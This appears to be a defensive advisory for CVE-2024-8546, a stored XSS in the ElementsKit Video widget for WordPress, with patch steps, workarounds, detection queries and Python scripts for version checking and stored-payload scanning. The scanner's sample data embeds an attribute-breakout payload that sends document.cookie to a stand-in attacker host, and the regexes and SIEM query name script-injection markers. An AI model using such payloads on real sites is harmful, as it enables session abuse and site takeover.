CVE-2024-8546
📋 TL;DR
This vulnerability allows authenticated WordPress users with Contributor-level access or higher to store script in the settings of the ElementsKit Video widget. Because the widget's user-supplied attributes are neither sanitized on input nor escaped on output, the stored script executes in the browser of every user who views the affected page (stored cross-site scripting). All sites running the ElementsKit Elementor addons plugin (slug elementskit-lite) up to and including version 3.2.7 are affected; version 3.2.8 contains the fix.
💻 Affected Systems
- ElementsKit Elementor addons plugin for WordPress
⚠️ Risk & Real-World Impact
Worst Case
An Administrator or Editor who views an injected page runs the payload in a session that carries their privileges. WordPress sets its authentication cookies HttpOnly, so the realistic outcome is not cookie theft but actions issued from the victim's browser with the victim's nonces: creating a new administrator account, installing a backdoored plugin, or editing theme files, any of which amounts to complete site compromise. Anonymous visitors can be redirected to malicious sites or served defaced content.
Likely Case
An attacker holding a Contributor account (obtained through open registration, weak credentials or credential stuffing) stores the payload in a Video widget. Because Contributors cannot publish, the first victims are usually the Editors or Administrators who preview and review the draft; once the page is live, every visitor runs the script, enabling redirects to phishing sites, injected advertisements or content, and requests made with the viewer's session.
If Mitigated
If the Video widget is disabled, Contributor-level accounts are limited to trusted users, and the front end ships a Content Security Policy that forbids inline script, the impact is reduced to content manipulation on the specific pages that contain the widget.
🎯 Exploit Status
Exploitation requires an authenticated account with Contributor-level or higher privileges. Once that access exists, the attacker only needs to place a Video widget with a crafted attribute value through the normal Elementor editor; no special tooling and no second vulnerability are required.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.2.8
Vendor Advisory: https://wordpress.org/plugins/elementskit-lite/#developers
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins → Installed Plugins.
3. Find ElementsKit Elementor addons (slug elementskit-lite).
4. Click 'Update Now' if available, or download version 3.2.8 or later from the WordPress plugin repository and install it over the existing copy.
5. Activate the updated plugin if it was deactivated during the update.
🔧 Temporary Workarounds
Disable Video Widget
Temporarily disable the vulnerable Video widget until patching is complete. Pages that already use the widget will not render it while it is disabled, so check that nothing business-critical depends on it.
Navigate to WordPress admin → ElementsKit → Widgets → Disable 'Video' widget
Restrict User Roles
Limit Contributor-level access (and every role above it) to trusted users only. This prevents new injections but does not remove payloads that are already stored, so also review existing pages containing the Video widget.
Navigate to WordPress admin → Users → change or remove the role of untrusted accounts; if Settings → General has 'Anyone can register' enabled, disable it or make sure the default role for new users cannot reach the Elementor editor
🧯 If You Can't Patch
- Ship a Content Security Policy on the front end whose script-src does not allow 'unsafe-inline' (use nonces or hashes instead). A CSP that still permits inline script does not block this payload, and many WordPress themes and plugins depend on inline script, so roll it out in Content-Security-Policy-Report-Only first and fix the reports before enforcing.
- Add web application firewall (WAF) rules that inspect the body of POST requests to /wp-admin/admin-ajax.php for script tags, javascript: URLs and on*= event-handler attributes in Elementor save requests. Treat this as a speed bump only: encoded and attribute-based payloads routinely evade signature matching.
- Neither control removes payloads already stored in _elementor_data post meta; audit pages containing the Video widget that were created or edited by Contributor accounts.
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin → Plugins → ElementsKit Elementor addons → Version number. If version is 3.2.7 or lower, you are vulnerable.
Check Version:
wp plugin list --name=elementskit-lite --field=version
Verify Fix Applied:
After updating, verify that the version shown on the WordPress plugins page is 3.2.8 or higher, and open a page that uses the Video widget to confirm it still renders correctly. Also review existing Video widgets added by lower-privileged accounts: the update fixes the rendering code but does not delete content that was already stored.
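As an added example (not tooling from the plugin, Elementor or this advisory), the script below reads the JSON form of the WP-CLI check above (`wp plugin list --name=elementskit-lite --format=json`) and flags a vulnerable install by numeric comparison. That detail matters: a string comparison ranks "3.2.10" below "3.2.8" and would report a later release as vulnerable. The plugin slug elementskit-lite and the fixed version 3.2.8 come from this page; the embedded WP-CLI output is constructed for illustration.

```python
"""Version check for CVE-2024-8546 against WP-CLI output.

Added example for this advisory; not tooling from the plugin or the advisory.
Feed it the JSON from:  wp plugin list --name=elementskit-lite --format=json
"""
import json
import re

PLUGIN_SLUG = "elementskit-lite"
FIXED_VERSION = (3, 2, 8)   # first release that carries the fix


def parse_version(version: str) -> tuple:
    """'3.2.7' -> (3, 2, 7).

    Only the leading digits of each dotted piece are kept, so '3.2.8-rc1'
    becomes (3, 2, 8); a piece with no digits counts as 0.
    """
    parts = []
    for piece in version.strip().split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group(0)) if m else 0)
    return tuple(parts)


def is_vulnerable(version: str) -> bool:
    """True for every release up to and including 3.2.7.

    Tuples compare element-wise, so 3.2.10 is correctly newer than 3.2.8,
    whereas the plain string '3.2.10' sorts below '3.2.8'.
    """
    return parse_version(version) < FIXED_VERSION


def assess_wp_cli_json(wp_cli_json: str) -> list:
    """Evaluate `wp plugin list --format=json` output.

    Returns one record per matching plugin with a 'vulnerable' flag. An
    inactive copy is still flagged: the vulnerable files remain on disk and
    the widget runs again as soon as the plugin is reactivated.
    """
    results = []
    for plugin in json.loads(wp_cli_json):
        if plugin.get("name") != PLUGIN_SLUG:
            continue
        results.append({
            "name": plugin["name"],
            "status": plugin.get("status", "unknown"),
            "version": plugin["version"],
            "vulnerable": is_vulnerable(plugin["version"]),
        })
    return results


# Constructed sample of WP-CLI output (not captured from a real site).
SAMPLE_WP_CLI_JSON = json.dumps([
    {"name": "elementskit-lite", "status": "active", "update": "available", "version": "3.2.7"},
    {"name": "elementor", "status": "active", "update": "none", "version": "3.0.0"},
])

if __name__ == "__main__":
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_WP_CLI_JSON
    for rec in assess_wp_cli_json(data):
        state = "VULNERABLE (<= 3.2.7)" if rec["vulnerable"] else "patched"
        print(f"{rec['name']} {rec['version']} [{rec['status']}]: {state}")
```

Pipe real output into it (the file name is your choice): `wp plugin list --name=elementskit-lite --format=json | python3 check_elementskit.py`. With nothing on stdin it evaluates the built-in sample.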
📡 Detection & Monitoring
Log Indicators:
- POST requests to /wp-admin/admin-ajax.php with action=elementor_ajax from Contributor accounts that save pages containing the Video widget (Elementor's editor saves page data through this endpoint)
- Bursts of failed logins followed by a successful login to a Contributor account, i.e. an account takeover that supplies the privilege the attack needs
- Script tags or event-handler attributes (onerror=, onmouseover=) inside Video widget settings in _elementor_data post meta, or in the rendered HTML of pages that contain the widget
Network Indicators:
- Visitors' browsers, not the web server, making requests to unfamiliar domains while viewing affected pages; the payload runs client-side, so a CSP report-only endpoint or browser-side telemetry surfaces this, whereas server egress monitoring will not
- Elementor save requests whose body carries script payloads in Video widget settings
SIEM Query (pseudo-syntax; adapt field names to your platform):
source="wordpress" AND uri_path="/wp-admin/admin-ajax.php" AND http_method="POST" AND parameters CONTAINS "elementor_ajax" AND (parameters CONTAINS "<script" OR parameters CONTAINS "%3Cscript" OR parameters CONTAINS "javascript:" OR parameters MATCHES "on[a-z]+=")
Caveats: the element settings travel in the POST body as URL-encoded JSON, so this match only works where a WAF or application log captures request bodies; a plain web-server access log records the URI, not the body. Match on the widget type string that appears in saved Elementor data rather than a generic name such as "video_widget". Attribute-based payloads (a title that closes its quote and adds an onmouseover handler) and encoded payloads evade a bare "<script>" match, so audit the stored _elementor_data as well.
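To audit stored content rather than request logs, the following added example (not code from the plugin, Elementor or this advisory) walks one post's _elementor_data JSON, which Elementor stores as a nested section/column/widget tree, and reports Video widget settings that contain script tags, javascript: URLs or inline event handlers, after undoing one layer of URL and HTML-entity encoding. It assumes the widget's Elementor type string is elementskit-video (confirm against get_name() in widgets/video/video.php of your install). The sample page data and its setting names are constructed placeholders, not the plugin's real control IDs. Passing widget_type=None extends the same check to every widget on the page, which goes beyond this CVE but catches the same payload class elsewhere.

```python
"""Scan Elementor page data for ElementsKit Video widgets carrying script-like
settings. Added example for this advisory; not code from the plugin, Elementor
or the advisory. Feed it:  wp post meta get <post_id> _elementor_data
"""
import html
import json
import re
from typing import Any, Iterator, Optional
from urllib.parse import unquote

# Elementor widgetType of the ElementsKit Video widget. ASSUMPTION: confirm
# against get_name() in widgets/video/video.php of the installed plugin.
VIDEO_WIDGET_TYPE = "elementskit-video"

# Markers that do not belong in a video title, URL or button label. The
# event-handler branch requires a preceding quote, slash or whitespace so a
# query string such as '&online=1' is not flagged.
SUSPICIOUS = re.compile(
    r"""<\s*script\b|javascript\s*:|(?:^|[\s"'/])on[a-z]+\s*=|<\s*(?:iframe|svg|img)\b|data:text/html""",
    re.IGNORECASE,
)


def normalise(value: str) -> str:
    """Undo one layer each of URL and HTML-entity encoding so an encoded
    payload (%3Cscript, &lt;script) matches the same patterns."""
    return html.unescape(unquote(value))


def walk_elements(elements: list) -> Iterator[dict]:
    """Depth-first walk over Elementor's nested section/column/widget tree."""
    for element in elements:
        yield element
        yield from walk_elements(element.get("elements", []))


def string_leaves(obj: Any, path: str = "") -> Iterator[tuple]:
    """Yield (dotted path, string) for every string inside a settings value."""
    if isinstance(obj, str):
        yield path, obj
    elif isinstance(obj, dict):
        for key, value in obj.items():
            yield from string_leaves(value, f"{path}.{key}" if path else key)
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            yield from string_leaves(value, f"{path}[{i}]")


def find_suspicious_widgets(elementor_data: str,
                            widget_type: Optional[str] = VIDEO_WIDGET_TYPE) -> list:
    """Return findings for widgets of `widget_type` whose settings match
    SUSPICIOUS. widget_type=None checks every widget on the page."""
    findings = []
    for element in walk_elements(json.loads(elementor_data)):
        if element.get("elType") != "widget":
            continue
        if widget_type is not None and element.get("widgetType") != widget_type:
            continue
        for path, value in string_leaves(element.get("settings", {})):
            match = SUSPICIOUS.search(normalise(value))
            if match:
                findings.append({
                    "widget_id": element.get("id"),
                    "widget_type": element.get("widgetType"),
                    "setting": path,
                    "match": match.group(0).strip(),
                    "value": value,
                })
    return findings


# Constructed sample of one post's _elementor_data (setting names are
# placeholders, not the plugin's real control IDs): a clean Video widget,
# one whose title breaks out of its attribute, and a heading outside scope.
SAMPLE_ELEMENTOR_DATA = json.dumps([
    {"id": "sec1", "elType": "section", "settings": {}, "elements": [
        {"id": "col1", "elType": "column", "settings": {}, "elements": [
            {"id": "vid_ok", "elType": "widget", "widgetType": VIDEO_WIDGET_TYPE,
             "settings": {"video_title": "Product tour",
                          "video_url": "https://www.youtube.com/watch?v=example&online=1"}},
            {"id": "vid_bad", "elType": "widget", "widgetType": VIDEO_WIDGET_TYPE,
             "settings": {"video_title": "Tour\" onmouseover=\"fetch('https://attacker.example/?c='+document.cookie)",
                          "video_url": "https://www.youtube.com/watch?v=example"}},
            {"id": "head1", "elType": "widget", "widgetType": "heading",
             "settings": {"title": "&lt;script&gt;alert(1)&lt;/script&gt;"}},
        ]},
    ]},
])

if __name__ == "__main__":
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_ELEMENTOR_DATA
    for f in find_suspicious_widgets(data):
        print(f"{f['widget_type']} {f['widget_id']} {f['setting']}: {f['match']!r} in {f['value']!r}")
```

Run it per post, for example `wp post meta get 42 _elementor_data | python3 scan_elementor.py` (file name is your choice), looping over the IDs from `wp post list --post_type=page --format=ids`. Each finding names the widget id and the setting path, so the page can be opened in the editor and the offending value removed; with no stdin the script evaluates the built-in sample, reporting vid_bad and ignoring the clean widget and the out-of-scope heading.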
🔗 References
- https://plugins.trac.wordpress.org/browser/elementskit-lite/trunk/widgets/video/parts/video-button.php#L10
- https://plugins.trac.wordpress.org/changeset/3155880/
- https://plugins.trac.wordpress.org/changeset/3155880/elementskit-lite/trunk/widgets/video/video.php
- https://wordpress.org/plugins/elementskit-lite/#developers
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d21aeeb6-2e7d-426e-82c5-ff65e33bc5cb?source=cve